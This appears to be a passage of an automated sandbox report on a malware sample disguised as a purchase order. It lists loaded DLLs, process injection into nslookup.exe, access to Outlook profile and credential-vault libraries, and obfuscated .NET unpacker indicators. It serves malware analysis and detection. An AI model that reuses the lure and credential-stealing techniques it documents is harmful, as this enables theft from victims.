        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Purchase Order_20240528.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Purchase Order_20240528.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: nslookup.pdb source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: nslookup.pdbGCTL source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000124B000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538100125.000000000125D000.00000004.00000020.00020000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000003.2148531111.000000000125A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2132913413.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2285918681.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Purchase Order_20240528.exe, Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: Purchase Order_20240528.exe, Form1.cs.Net Code: InitializeComponent
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.cs.Net Code: ojexD5sK3l System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.cs.Net Code: ojexD5sK3l System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.2815b80.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.5280000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.cs.Net Code: ojexD5sK3l System.Reflection.Assembly.Load(byte[])
        Source: 5.2.nslookup.exe.384cd08.2.raw.unpack, Form1.cs.Net Code: InitializeComponent
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_00E1CCB1 push 3800EABBh; retf 0_2_00E1CCBD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_00E19235 push ss; retf 0_2_00E19236
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015B225F pushad ; ret 3_2_015B27F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015B27FA pushad ; ret 3_2_015B27F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E09AD push ecx; mov dword ptr [esp], ecx3_2_015E09B6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015B283D push eax; iretd 3_2_015B2858
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00418367 push ss; retf 3_2_00418372
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00418311 push ss; retf 3_2_00418372
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00414446 pushfd ; ret 3_2_00414454
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004087A1 push esp; iretd 3_2_004087C4
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0041A96D pushad ; retf 3_2_0041A96E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0041CC98 push ebx; retf 3_2_0041CCBB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0040CE71 push edx; iretd 3_2_0040CE7B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0040D5FC push ds; iretd 3_2_0040D60B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0040D641 push ds; iretd 3_2_0040D60B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0040D85E push 6594F3BCh; retf 3_2_0040D865
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00407A78 push FFFFFFB4h; ret 3_2_00407A7C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00413C15 push ecx; retf 4E5Bh3_2_00413C31
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00423D63 push eax; iretd 3_2_00423DB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00417F65 push esp; retf 3_2_00417F8A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00425F03 push ebx; iretd 3_2_00425FF9
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0318225F pushad ; ret 5_2_031827F9
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031827FA pushad ; ret 5_2_031827F9
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031B09AD push ecx; mov dword ptr [esp], ecx5_2_031B09B6
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0318283D push eax; iretd 5_2_03182858
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0318135E push eax; iretd 5_2_03181369
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A70720 push eax; iretd 5_2_02A7076D
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A70712 push eax; iretd 5_2_02A7076D
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A54435 push FFFFFFB4h; ret 5_2_02A54439
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A605D2 push ecx; retf 4E5Bh5_2_02A605EE
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A728C0 push ebx; iretd 5_2_02A729B6
        Source: Purchase Order_20240528.exeStatic PE information: section name: .text entropy: 7.971095603069869
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, vIxLQ9MsCwcQkaGqIj.csHigh entropy of concatenated method names: 'OMZZEJXLV4', 'aBDZ1bCURr', 'QDdZDniLoL', 'DxTZybg979', 'BemZYq7PUy', 'wTvZqrenTv', 'NR8Zmu9oS5', 'ydMZs4I6hh', 'maGQwWceNvCk1MyCxW5', 'jJXS5EcBbT05Ws7ES3j'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, LX5jsnwAlxmk5irAo7.csHigh entropy of concatenated method names: 'r41o9oehfF', 'OC1oj4S8cB', 'uEPBSElF3M', 'i5PBTnFWEX', 'bH1oG0UFYu', 'Rjto3VhpBA', 's3JoJF6bXd', 'lIhouVhMOQ', 'hFio0L8yc7', 'BREoWJPoyp'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, X3E8c1Wi6jhLZirVls.csHigh entropy of concatenated method names: 'ToString', 'N9ERGhBfI6', 'lBXROr8hS9', 'XX5Re9M36c', 'xdmRMvPhxL', 'kQHRKSQ3BY', 'CIuRC05BDE', 'nbdRa7lYlP', 'IZNR8iqUZn', 'BRCRfpNxtr'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, jPJ3l2QK6gtApY0G9A.csHigh entropy of concatenated method names: 'Dispose', 'UkUTFDGZNe', 'XBbAOCGpxm', 'vPWAAMnhpO', 'pAMTjZvlLl', 'hfkTzaw37Y', 'ProcessDialogKey', 'kG6ASxIt3I', 'FPkATgyOMT', 'Y3eAArGeWP'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, AxIt3IFgPkgyOMTj3e.csHigh entropy of concatenated method names: 'yHaBgMuSZk', 'AbWBOtaKva', 'GATBeEmE31', 'dIgBMdqWGP', 'U3eBuP4AtM', 'tjWBK4dex3', 'Next', 'Next', 'Next', 'NextBytes'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, utOO9LJhS14kuWKB8b.csHigh entropy of concatenated method names: 'CG1k5Angt2', 'wuUkmPbdvi', 'Lnrkg0QL2j', 'H6AkOLoF1J', 'Mj4kMujyKx', 'VLekKdKb8r', 'tonkaMlEZI', 'zMVk80ZmUH', 'zUJkHiW4bt', 'rlhkG24wim'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, LBJhZvsXM9Poch9qRF.csHigh entropy of concatenated method names: 'xpcL6G2bgX', 'heiLqbWuMo', 'tRyXeltoFc', 'MwWXMm6yYT', 'UD9XKh097K', 'tSdXC63v6H', 'ofVXajxjNK', 'kCkX8uFcrK', 'weUXfJH0t6', 'Q7GXH9lqiR'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, laNNGDaa1A73ahvoq9.csHigh entropy of concatenated method names: 'Tngi2bujNT', 'UYyiX1pN4y', 'xlpiZPMgm2', 'Nd2Zj5TyLS', 'P83ZzaJVus', 'tWViSX6PED', 'hZDiThh6oo', 'q6jiApOBay', 'mXxi7skXll', 'Cw4ixGdjHq'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, IgDTacu5vQcOrwm4pA.csHigh entropy of concatenated method names: 'By5cHafBZn', 'BYWc3BU4Jp', 'hCmcuFlieL', 'k7dc0YNPnJ', 'FFucOVSpym', 'OsxceYfQDF', 'tG2cMVjPWl', 'zGtcK4pVe0', 'qVOcC2ih7K', 'HiDcaJNRj4'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, wHVIVE5avXWDL9RIrc.csHigh entropy of concatenated method names: 'jJ7QuofcSb', 'JElQ0bT2qn', 'XKdQWYEJjx', 'tlMQnvkSY0', 'hilQdyx0xe', 'Q5mQwdNfAZ', 'FPJQpWcqiZ', 'LJnQ9Ome36', 'zbBQFAsvSU', 'UPcQjOB6tQ'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.csHigh entropy of concatenated method names: 'x0j7tPfKNs', 'IZ37252hkO', 'p8x7QZuY2c', 'nbZ7XgilOd', 'XE57LByv20', 'eC77ZBF7QY', 'Q797iGCl3d', 'J8J7r1IMEJ', 'cik7VB9dUZ', 'ldS7hopjkh'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, kGeWP0jdqfW8t05Vsr.csHigh entropy of concatenated method names: 'FStbT9GNgj', 'RPhb71LGr7', 'CYjbxTSNbX', 'bIhb2oPFdX', 'i6NbQK1hrg', 'xrlbLIxekp', 'xxEbZyQnQN', 'vZwBp0HWVG', 'KsWB999MVK', 'UOGBFSO6O4'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, BJ8mg0mwEhLKlijblM.csHigh entropy of concatenated method names: 'CCJXyCqyWO', 'JZxXYqvk4L', 'Tl3X5Yecl3', 'A2hXmpabPd', 'jboXcQ7Qtd', 'PGgXRBp0fr', 'RXKXoJENXQ', 'XkjXBO08DQ', 'SnjXbHihhX', 'MHmXUrsUHf'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, Iyxd2hT7F3ceptmnRAC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'drdUuWJGuj', 'dXbU010c2F', 'mGjUWBGWIJ', 'riYUn4Igdo', 'Sf8UdsPiGp', 'nv0UwcTPEK', 'B4AUppYnf2'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, EfqCIiA0MeMcoJJOWE.csHigh entropy of concatenated method names: 'hsXD5tUFk', 'moyy5S3Op', 'k9OYeYW3m', 'sgTqp7oEM', 'mrYmWiXem', 'sVZs0bPMj', 'Js3y0EPUeOE376E1pa', 'yvFAAkj79OxgWmTodd', 'gXpBo7Kq7', 'AjkUVRCG2'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, RCafVKzvRZCyLPbNSs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'auTbkfeDes', 'IjUbcwHDOw', 'wkibReHduc', 'Mtiboe8j25', 'jc8bBIR3jR', 'rY1bbrfjEH', 'fApbUemK8c'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, nhx42kgPpNDJ8ldnY6.csHigh entropy of concatenated method names: 'GaAZtDeP5u', 'Qo7ZQmuUBI', 'ePBZLLNebC', 'A24Zi1jxST', 'q6mZrNDXO2', 'OAWLdTnkGR', 'Cp9LwrdoTO', 'PfpLpyWI5f', 'jTtL9hxZK3', 'snZLF8nDFb'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, iKlnrXfiLbCbH1pXku.csHigh entropy of concatenated method names: 'EJii1mSEXC', 'mnEivSCd35', 'sqkiDPiwC4', 'XRliySg4ia', 'uZyi6fqKBM', 'JJJiYUTC30', 'OjWiqKxHNW', 'I2Ii52LgIg', 'DntimFcKcU', 'kPtisiUIRT'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, Fi83WJCdaDIbw1hFZY.csHigh entropy of concatenated method names: 'bYmZW71mkX', 'WqyZnNReMA', 'hWGZd9PcVl', 'ToString', 'G37Zw6cFoS', 'hs5ZphOpXQ', 'ICjx2BcDxLgkTiCAhMu', 'M3G3QXcpbT03f4AVbQt'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, KfZZI5xi9gi0wyGNgg.csHigh entropy of concatenated method names: 'MnITiHVIVE', 'LvXTrWDL9R', 'SwEThhLKli', 'YblT4MaBJh', 'l9qTcRF4hx', 'm2kTRPpNDJ', 'lJx89bLSfdSh6Q4T6b', 'c9wEinkhQBn1u8f69Y', 'Jb8TT0E4x9', 'mA6T7MNFvS'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, FDnQ1GTSbdEiBe64ky8.csHigh entropy of concatenated method names: 'ioXb1182pg', 'JubbvNfJoE', 'OavbDwEwg3', 'l7Yby9LLBY', 'vunb6WkSiC', 'C5qbYH6se9', 'xSubqhLrqQ', 'oxHb5bMTYp', 'upDbmGNHCa', 'GiNbsF2GIk'
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, cMZvlL9lXfkaw37YrG.csHigh entropy of concatenated method names: 'tFrB2Ae0yg', 'WmSBQeL5cY', 'zdQBXMpD4M', 'rVOBL6qors', 'NXBBZEyw8E', 'UWLBiUlZ3X', 'PcCBrEiRp1', 'xcuBVrrO25', 'eFjBhi9Qpd', 'tumB4NOYoK'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, vIxLQ9MsCwcQkaGqIj.csHigh entropy of concatenated method names: 'OMZZEJXLV4', 'aBDZ1bCURr', 'QDdZDniLoL', 'DxTZybg979', 'BemZYq7PUy', 'wTvZqrenTv', 'NR8Zmu9oS5', 'ydMZs4I6hh', 'maGQwWceNvCk1MyCxW5', 'jJXS5EcBbT05Ws7ES3j'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, LX5jsnwAlxmk5irAo7.csHigh entropy of concatenated method names: 'r41o9oehfF', 'OC1oj4S8cB', 'uEPBSElF3M', 'i5PBTnFWEX', 'bH1oG0UFYu', 'Rjto3VhpBA', 's3JoJF6bXd', 'lIhouVhMOQ', 'hFio0L8yc7', 'BREoWJPoyp'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, X3E8c1Wi6jhLZirVls.csHigh entropy of concatenated method names: 'ToString', 'N9ERGhBfI6', 'lBXROr8hS9', 'XX5Re9M36c', 'xdmRMvPhxL', 'kQHRKSQ3BY', 'CIuRC05BDE', 'nbdRa7lYlP', 'IZNR8iqUZn', 'BRCRfpNxtr'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, jPJ3l2QK6gtApY0G9A.csHigh entropy of concatenated method names: 'Dispose', 'UkUTFDGZNe', 'XBbAOCGpxm', 'vPWAAMnhpO', 'pAMTjZvlLl', 'hfkTzaw37Y', 'ProcessDialogKey', 'kG6ASxIt3I', 'FPkATgyOMT', 'Y3eAArGeWP'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, AxIt3IFgPkgyOMTj3e.csHigh entropy of concatenated method names: 'yHaBgMuSZk', 'AbWBOtaKva', 'GATBeEmE31', 'dIgBMdqWGP', 'U3eBuP4AtM', 'tjWBK4dex3', 'Next', 'Next', 'Next', 'NextBytes'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, utOO9LJhS14kuWKB8b.csHigh entropy of concatenated method names: 'CG1k5Angt2', 'wuUkmPbdvi', 'Lnrkg0QL2j', 'H6AkOLoF1J', 'Mj4kMujyKx', 'VLekKdKb8r', 'tonkaMlEZI', 'zMVk80ZmUH', 'zUJkHiW4bt', 'rlhkG24wim'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, LBJhZvsXM9Poch9qRF.csHigh entropy of concatenated method names: 'xpcL6G2bgX', 'heiLqbWuMo', 'tRyXeltoFc', 'MwWXMm6yYT', 'UD9XKh097K', 'tSdXC63v6H', 'ofVXajxjNK', 'kCkX8uFcrK', 'weUXfJH0t6', 'Q7GXH9lqiR'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, laNNGDaa1A73ahvoq9.csHigh entropy of concatenated method names: 'Tngi2bujNT', 'UYyiX1pN4y', 'xlpiZPMgm2', 'Nd2Zj5TyLS', 'P83ZzaJVus', 'tWViSX6PED', 'hZDiThh6oo', 'q6jiApOBay', 'mXxi7skXll', 'Cw4ixGdjHq'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, IgDTacu5vQcOrwm4pA.csHigh entropy of concatenated method names: 'By5cHafBZn', 'BYWc3BU4Jp', 'hCmcuFlieL', 'k7dc0YNPnJ', 'FFucOVSpym', 'OsxceYfQDF', 'tG2cMVjPWl', 'zGtcK4pVe0', 'qVOcC2ih7K', 'HiDcaJNRj4'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, wHVIVE5avXWDL9RIrc.csHigh entropy of concatenated method names: 'jJ7QuofcSb', 'JElQ0bT2qn', 'XKdQWYEJjx', 'tlMQnvkSY0', 'hilQdyx0xe', 'Q5mQwdNfAZ', 'FPJQpWcqiZ', 'LJnQ9Ome36', 'zbBQFAsvSU', 'UPcQjOB6tQ'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.csHigh entropy of concatenated method names: 'x0j7tPfKNs', 'IZ37252hkO', 'p8x7QZuY2c', 'nbZ7XgilOd', 'XE57LByv20', 'eC77ZBF7QY', 'Q797iGCl3d', 'J8J7r1IMEJ', 'cik7VB9dUZ', 'ldS7hopjkh'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, kGeWP0jdqfW8t05Vsr.csHigh entropy of concatenated method names: 'FStbT9GNgj', 'RPhb71LGr7', 'CYjbxTSNbX', 'bIhb2oPFdX', 'i6NbQK1hrg', 'xrlbLIxekp', 'xxEbZyQnQN', 'vZwBp0HWVG', 'KsWB999MVK', 'UOGBFSO6O4'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, BJ8mg0mwEhLKlijblM.csHigh entropy of concatenated method names: 'CCJXyCqyWO', 'JZxXYqvk4L', 'Tl3X5Yecl3', 'A2hXmpabPd', 'jboXcQ7Qtd', 'PGgXRBp0fr', 'RXKXoJENXQ', 'XkjXBO08DQ', 'SnjXbHihhX', 'MHmXUrsUHf'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, Iyxd2hT7F3ceptmnRAC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'drdUuWJGuj', 'dXbU010c2F', 'mGjUWBGWIJ', 'riYUn4Igdo', 'Sf8UdsPiGp', 'nv0UwcTPEK', 'B4AUppYnf2'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, EfqCIiA0MeMcoJJOWE.csHigh entropy of concatenated method names: 'hsXD5tUFk', 'moyy5S3Op', 'k9OYeYW3m', 'sgTqp7oEM', 'mrYmWiXem', 'sVZs0bPMj', 'Js3y0EPUeOE376E1pa', 'yvFAAkj79OxgWmTodd', 'gXpBo7Kq7', 'AjkUVRCG2'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, RCafVKzvRZCyLPbNSs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'auTbkfeDes', 'IjUbcwHDOw', 'wkibReHduc', 'Mtiboe8j25', 'jc8bBIR3jR', 'rY1bbrfjEH', 'fApbUemK8c'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, nhx42kgPpNDJ8ldnY6.csHigh entropy of concatenated method names: 'GaAZtDeP5u', 'Qo7ZQmuUBI', 'ePBZLLNebC', 'A24Zi1jxST', 'q6mZrNDXO2', 'OAWLdTnkGR', 'Cp9LwrdoTO', 'PfpLpyWI5f', 'jTtL9hxZK3', 'snZLF8nDFb'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, iKlnrXfiLbCbH1pXku.csHigh entropy of concatenated method names: 'EJii1mSEXC', 'mnEivSCd35', 'sqkiDPiwC4', 'XRliySg4ia', 'uZyi6fqKBM', 'JJJiYUTC30', 'OjWiqKxHNW', 'I2Ii52LgIg', 'DntimFcKcU', 'kPtisiUIRT'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, Fi83WJCdaDIbw1hFZY.csHigh entropy of concatenated method names: 'bYmZW71mkX', 'WqyZnNReMA', 'hWGZd9PcVl', 'ToString', 'G37Zw6cFoS', 'hs5ZphOpXQ', 'ICjx2BcDxLgkTiCAhMu', 'M3G3QXcpbT03f4AVbQt'
